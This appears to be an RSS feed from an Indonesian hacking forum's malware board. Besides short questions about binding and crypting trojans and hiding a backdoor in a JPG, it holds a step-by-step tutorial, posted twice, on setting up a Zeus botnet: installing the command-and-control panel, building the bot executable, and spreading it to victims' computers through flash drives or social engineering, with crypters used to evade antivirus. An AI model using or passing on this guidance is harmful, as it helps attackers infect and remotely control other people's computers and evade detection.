<![CDATA[BackBox Indonesia - Malware]]>

<![CDATA[BackBox Indonesia - Malware]]> https://www.backboxindonesia.or.id/ Wed, 20 May 2026 23:48:49 +0000 MyBB <![CDATA[ask cara binding & crypter trojan/malware?]]> https://www.backboxindonesia.or.id/thread-212.html Wed, 29 Mar 2017 21:40:09 +0000 https://www.backboxindonesia.or.id/thread-212.html <![CDATA[[TANYA] Ada yang tau cara nyisipin backdoor ke poto.jpg]]> https://www.backboxindonesia.or.id/thread-157.html Sun, 31 Jul 2016 00:43:05 +0000 https://www.backboxindonesia.or.id/thread-157.html Jadi gini, ane mau coba tanem backdoor untuk bisa remote accsess ke PC. Nah tapi melalui poto yang di klick. Mohon ilmunya para mastah sekalian. Terima kasih :*]]> Jadi gini, ane mau coba tanem backdoor untuk bisa remote accsess ke PC. Nah tapi melalui poto yang di klick. Mohon ilmunya para mastah sekalian. Terima kasih :*]]> <![CDATA[Remote Administration Tool Zeus BotNet]]> https://www.backboxindonesia.or.id/thread-144.html Fri, 01 Jul 2016 20:20:05 +0000 https://www.backboxindonesia.or.id/thread-144.html Pagi ini saya akan coba mempraktekan system kerja trojan Zeus Botnet.
Pada tutorial kali ini saya tidak akan banyak cuap", karena tutorial kali ini sedikit agak panjang step"nya.
Ayo kita mulai :D

Pertamatama kita download dulu zeus botnetnya di sini

Code:
http://www.backboxindonesia.or.id/tmp/zeus_botnet.zip

Password : 123

Setelah kita download, kita extrak filenya di sembarang folder. Nanti di file zip tadi akan meng extrak beberapa file yaitu file

Code:
builder

other

webserver

client32.bin

config

db.sql

Di sini saya menggunakan system operasi backbox sebagai uji coba server botnetnya. Sebelum lanjut ke langkah berikutnya kita harus install dulu lamp di system kita. Sebagai referensi tutorialnya bisa lihat Disini. Langkah selanjutnya kita pindahkan folder "webserver" ke folder "/var/www/html/". Lakukan perintah ini di folder yang telah kita extrak tadi.

Code:
root@backbox:~$ sudo mv webserver/ /var/www/html/webserver/

Setelah itu kita hidupkan webserver yang ada di system kita. Perintah untuk menghidupkannya yaitu.

Code:
root@backbox:~$ sudo service apache2 start

Webserver sudah kita hidupkan, langkah selanjutnya kita buat databasenya di mysql. Ketikan perintah ini untuk login database dan membuat databasenya.

Code:
root@backbox:~$ sudo mysql -u root -p

Enter password: (masukanpassword)

mysql> create database botnet;

Setelah database di buat, kita import file "db.sql" yang sudah kita extrak tadi ke database "botnet" yang telah kita buat dengan perintah ini di terminal tadi.

Code:
mysql> use botnet;

mysql> source /home/user/Downloads/zeus_botnet/db.sql;

Folder source sesuaikan dengan letak file yang agan extrak tadi.
Setelah di import, kita buka browser dan buka alamat ip kita dengan di tambah "/webserver/install/" di alamat ip kita. Sebagai contoh alamatnya seperti ini : http://192.168.2.1/webserver/install/
Kalau di browser muncul tampilannya seperti ini

[Image: sRk5hwA.png]

Rubah hak akses root dengan www-data dan rubah permision filenya jadi 0755 di folder /var/www/html/webserver/ dengan mengetikan perintah ini.

Code:
root@backbox:~$ sudo su

root@backbox:~$ cd /var/www/html/

root@backbox:~$ chown www-data:www-data webserver -Rh

root@backbox:~$ chmod 0755 webserver -R

Setelah forbiden di fix kita reload kembali browsernya. Dan tampilannya akan seperti ini.

[Image: HxtP8nh.png]

Data isi sesuai dengan kebutuhan. Ini hanya ilustrasi data yang akan kita input. Setelah itu kita klik tombol install yang ada di sebelah kanan bawah. Tunggu beberapa detik nanti tampilannya akan seperti ini.

[Image: SUmyxwt.png]

Setelah proses instalasi selesai, hapus folder install yang ada di folder webserver dengan mengetikan perintah ini di terminal

Code:
root@backbox:~$ sudo rm -rf /var/www/html/webserver/install

Berikutnya kita buka alamat ip kita di web browser dengan menambahkan alamat ini "/webserver/cp.php", sebagai contoh alamatnya seperti ini http://192.168.2.1/webserver/cp.php
Alamat itu adalah halaman login botnet yang nanti akan kita gunakan. Kurang lebih tampilannya seperti ini.

[Image: oKvnHLX.png]

Langkah berikutnya kita masukan user dan password yang sudah kita buat tadi. Dan taraaa

[Image: htGCzh1.png]

Server botnet sudah kita buat, selanjutnya kita buat client/trojan untuk kita sebarkan ke komputer korban. Di file extrakan tadi ada folder "builder", di dalam folder itu ada 3 file yaitu file.

Code:
config.txt

webinjects.txt

zsb.exe

Di ketiga file itu kita coba edit file config.txt, file itu adalah setingan buat nge generate trojan yang akan kita buat. Disini saya menggunakan mousepad untuk mengedit file tersebut. Ketik perintah ini di terminal

Code:
root@backbox:~$ mousepad config.txt

Rubah alamat server menjadi alamat ip kita. Sebagai contoh saya rubah alamatnya menjadi seperti ini..

[Image: OCqUcva.png]

Atau bisa di sesuaikan dengan alamat server yang sudah kita buat.
Setelah setingan sudah kita set, selanjutnya kita buka file "zsb.exe" yang ada di folder builder menggunakan wine. Atau bisa juga ketik di terminal.

Code:
root@backbox:~$ wine zsb.exe

Setelah kita eksekusi nanti akan keluar form builder untuk membuat client trojannya. Di aplikasi tersebut kilik "Builder > Build the bot configuration & Build the bot executable" Nanti save & save aja.

[Image: rDqq8xX.png]

Dua file berhasil ke generate antara file "bot.exe dan config.bin", dua file ini yang nantinya akan kita simpan di folder "webserver". Untuk memindahkan kedua file tersebut kita ketikan perintah ini di folder builder tadi.

Code:
root@backbox:~$ sudo cp bot.exe /var/www/html/webserver/

root@backbox:~$ sudo cp config.bin /var/www/html/webserver/

root@backbox:~$ sudo chown www-data:www-data /var/www/html/webserver/*

Selanjutnya tahap penyebaran fiile ke komputer yang ingin kita remote dan di susupi. Teknik penyebaran cukup pariatif, kita bisa menyebarkan file tersebut lewat flash disk atau social engineering. Sekedar info saja, kalo file trojan kita tidak ingin ke deteksi oleh antivirus, kita bisa pake program crypter atau binder..
Ibaratnya kita sudah tanam trojan kita ke komputer korban, nah untuk mengakses trojan tersebut kita tinggal buka aja web interface zeus yang tadi sudah kita install. Nanti kalau ada client yang konek ke jaringan akan otomatis terkoneksi dengan server.

]]> Pagi ini saya akan coba mempraktekan system kerja trojan Zeus Botnet.
Pada tutorial kali ini saya tidak akan banyak cuap", karena tutorial kali ini sedikit agak panjang step"nya.
Ayo kita mulai :D

Pertamatama kita download dulu zeus botnetnya di sini

Code:
http://www.backboxindonesia.or.id/tmp/zeus_botnet.zip

Password : 123

Setelah kita download, kita extrak filenya di sembarang folder. Nanti di file zip tadi akan meng extrak beberapa file yaitu file

Code:
builder

other

webserver

client32.bin

config

db.sql

Di sini saya menggunakan system operasi backbox sebagai uji coba server botnetnya. Sebelum lanjut ke langkah berikutnya kita harus install dulu lamp di system kita. Sebagai referensi tutorialnya bisa lihat Disini. Langkah selanjutnya kita pindahkan folder "webserver" ke folder "/var/www/html/". Lakukan perintah ini di folder yang telah kita extrak tadi.

Code:
root@backbox:~$ sudo mv webserver/ /var/www/html/webserver/

Setelah itu kita hidupkan webserver yang ada di system kita. Perintah untuk menghidupkannya yaitu.

Code:
root@backbox:~$ sudo service apache2 start

Webserver sudah kita hidupkan, langkah selanjutnya kita buat databasenya di mysql. Ketikan perintah ini untuk login database dan membuat databasenya.

Code:
root@backbox:~$ sudo mysql -u root -p

Enter password: (masukanpassword)

mysql> create database botnet;

Setelah database di buat, kita import file "db.sql" yang sudah kita extrak tadi ke database "botnet" yang telah kita buat dengan perintah ini di terminal tadi.

Code:
mysql> use botnet;

mysql> source /home/user/Downloads/zeus_botnet/db.sql;

Folder source sesuaikan dengan letak file yang agan extrak tadi.
Setelah di import, kita buka browser dan buka alamat ip kita dengan di tambah "/webserver/install/" di alamat ip kita. Sebagai contoh alamatnya seperti ini : http://192.168.2.1/webserver/install/
Kalau di browser muncul tampilannya seperti ini

[Image: sRk5hwA.png]

Rubah hak akses root dengan www-data dan rubah permision filenya jadi 0755 di folder /var/www/html/webserver/ dengan mengetikan perintah ini.

Code:
root@backbox:~$ sudo su

root@backbox:~$ cd /var/www/html/

root@backbox:~$ chown www-data:www-data webserver -Rh

root@backbox:~$ chmod 0755 webserver -R

Setelah forbiden di fix kita reload kembali browsernya. Dan tampilannya akan seperti ini.

[Image: HxtP8nh.png]

Data isi sesuai dengan kebutuhan. Ini hanya ilustrasi data yang akan kita input. Setelah itu kita klik tombol install yang ada di sebelah kanan bawah. Tunggu beberapa detik nanti tampilannya akan seperti ini.

[Image: SUmyxwt.png]

Setelah proses instalasi selesai, hapus folder install yang ada di folder webserver dengan mengetikan perintah ini di terminal

Code:
root@backbox:~$ sudo rm -rf /var/www/html/webserver/install

Berikutnya kita buka alamat ip kita di web browser dengan menambahkan alamat ini "/webserver/cp.php", sebagai contoh alamatnya seperti ini http://192.168.2.1/webserver/cp.php
Alamat itu adalah halaman login botnet yang nanti akan kita gunakan. Kurang lebih tampilannya seperti ini.

[Image: oKvnHLX.png]

Langkah berikutnya kita masukan user dan password yang sudah kita buat tadi. Dan taraaa

[Image: htGCzh1.png]

Server botnet sudah kita buat, selanjutnya kita buat client/trojan untuk kita sebarkan ke komputer korban. Di file extrakan tadi ada folder "builder", di dalam folder itu ada 3 file yaitu file.

Code:
config.txt

webinjects.txt

zsb.exe

Di ketiga file itu kita coba edit file config.txt, file itu adalah setingan buat nge generate trojan yang akan kita buat. Disini saya menggunakan mousepad untuk mengedit file tersebut. Ketik perintah ini di terminal

Code:
root@backbox:~$ mousepad config.txt

Rubah alamat server menjadi alamat ip kita. Sebagai contoh saya rubah alamatnya menjadi seperti ini..

[Image: OCqUcva.png]

Atau bisa di sesuaikan dengan alamat server yang sudah kita buat.
Setelah setingan sudah kita set, selanjutnya kita buka file "zsb.exe" yang ada di folder builder menggunakan wine. Atau bisa juga ketik di terminal.

Code:
root@backbox:~$ wine zsb.exe

Setelah kita eksekusi nanti akan keluar form builder untuk membuat client trojannya. Di aplikasi tersebut kilik "Builder > Build the bot configuration & Build the bot executable" Nanti save & save aja.

[Image: rDqq8xX.png]

Dua file berhasil ke generate antara file "bot.exe dan config.bin", dua file ini yang nantinya akan kita simpan di folder "webserver". Untuk memindahkan kedua file tersebut kita ketikan perintah ini di folder builder tadi.

Code:
root@backbox:~$ sudo cp bot.exe /var/www/html/webserver/

root@backbox:~$ sudo cp config.bin /var/www/html/webserver/

root@backbox:~$ sudo chown www-data:www-data /var/www/html/webserver/*

Selanjutnya tahap penyebaran fiile ke komputer yang ingin kita remote dan di susupi. Teknik penyebaran cukup pariatif, kita bisa menyebarkan file tersebut lewat flash disk atau social engineering. Sekedar info saja, kalo file trojan kita tidak ingin ke deteksi oleh antivirus, kita bisa pake program crypter atau binder..
Ibaratnya kita sudah tanam trojan kita ke komputer korban, nah untuk mengakses trojan tersebut kita tinggal buka aja web interface zeus yang tadi sudah kita install. Nanti kalau ada client yang konek ke jaringan akan otomatis terkoneksi dengan server.

]]>